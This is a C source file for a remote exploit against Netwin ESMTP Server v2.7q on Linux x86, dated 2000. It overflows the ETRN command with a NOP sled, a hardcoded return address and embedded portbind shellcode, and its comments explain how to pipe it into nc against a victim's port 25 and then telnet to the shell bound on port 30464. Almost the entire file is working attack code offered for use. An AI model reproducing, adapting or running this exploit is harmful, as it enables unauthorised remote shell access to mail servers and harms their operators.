Netwin ESMTP Server v2.7q linux x86 remote exploit. Tested on RedHat 6.1, binds a shell to TCP port 30464.
f6229c6e2a67eb3307f3fb307b27985b9446209516295d99dc899bca3fe60903
/*
* Netwin ESMTP Server v2.7q linux x86 remote exploit
* funkySh 05/06/2000 (Taeho Oh portbind shell)
* hello to b0f, #hax
*
* [ AAA ][ RET ][ NOP ][ SHELL ]
* $ (./dmx [offset] ; cat ) | nc victim 25
* $ telnet victim 30464
*
* (tested on RH6.1)
*/
#include <stdio.h>
char code[]=
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";
#define BUFFER 1100
#define A_BUFF 250
#define RET_ADDR 0xbfffca74
#define ALIGN 0
char buf[BUFFER];
int main(int argc, char * argv[])
{
int i, offset = 0;
long address;
if(argc > 1) offset = atoi(argv[1]);
address = RET_ADDR + offset;
memset(buf,0x90,BUFFER);
memset(buf,0x41,A_BUFF);
for(i=240+ALIGN;i<350;i+=4)
*(int *)&buf[i]=address;
memcpy(buf+880,code,strlen(code));
fprintf(stderr,"Using: 0x%x\n", address);
printf("HELO dupa\n",0);
printf("ETRN %s\n", buf);
fprintf(stderr,"Now try to telnet victim:30464\n");
}